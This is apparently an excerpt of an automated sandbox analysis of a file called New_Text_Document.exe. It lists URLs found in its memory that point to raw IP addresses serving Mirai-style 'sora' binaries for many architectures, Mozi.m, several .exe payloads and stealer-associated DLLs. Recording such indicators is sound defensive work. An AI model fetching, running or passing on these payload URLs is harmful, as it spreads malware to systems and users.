                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.97.146/6ccf1f8d6fe7b779/nss3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.97.146/6ccf1f8d6fe7b779/softokn3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.97.146/6ccf1f8d6fe7b779/sqlite3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.97.146/6ccf1f8d6fe7b779/vcruntime140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.94.122.33:40375/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.111.33.100:1763/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.111.59.149:44237/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.140.61.64:61216/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.188.136.200:5631/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.188.188.141:30828/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.188.27.225:4782/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.188.59.173:37671/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.189.27.157:62661/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.189.33.30:14792/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.197.6.50:32275/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.38.98.43:25323/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.10.210.149:5913/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.11.158.214:37456/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.11.164.51:32561/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.11.38.194:11782/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.11.92.231:9510/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.62.146/bins/sora.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.62.146/bins/sora.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.62.146/bins/sora.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.62.146/bins/sora.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.62.146/bins/sora.i686
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.62.146/bins/sora.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.62.146/bins/sora.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.62.146/bins/sora.mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.62.146/bins/sora.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.62.146/bins/sora.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.62.146/bins/sora.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.62.146/bins/sora.x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.122.116.101:2933/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.127.103.197:20071/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.192.18/latestX.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.192.18/newmar.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.2.236.151:52527/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.30.142.28:36361/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.35.133.40:22235/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.54.102.156:36485/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.58.245.134:44238/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.8.103.110:61487/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.8.195.180:35186/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.11.62.54:1113/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.11.84.213:33121/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.119.16.128:5934/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.15.174.119:59020/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.178.202.175:33877/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.184.108.152:49302/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.191.100.19:30227/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.191.165.45:2025/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.210.27.21:48692/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.210.35.140:7607/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.216.118.51:3212/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.91.113.187:59874/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.97.255.155:45764/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.98.144.32:7498/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.98.159.141:31657/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.98.202.200:2243/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.16.125.118:34303/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.161.229.93/ca.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.161.229.93/fra.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.174.34.108:9255/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.19.140.150/2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.218.171.78:38744/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.218.207.112:59230/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.218.212.95:65530/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.92.36.96:13830/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.1.140.244:60008/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.1.25.159:8174/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.115.209.180/0.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.142.100.221:22276/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.209.187.190:32382/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.25.187.137:26322/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.28.205.97:14042/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.51.115.133:47510/.i
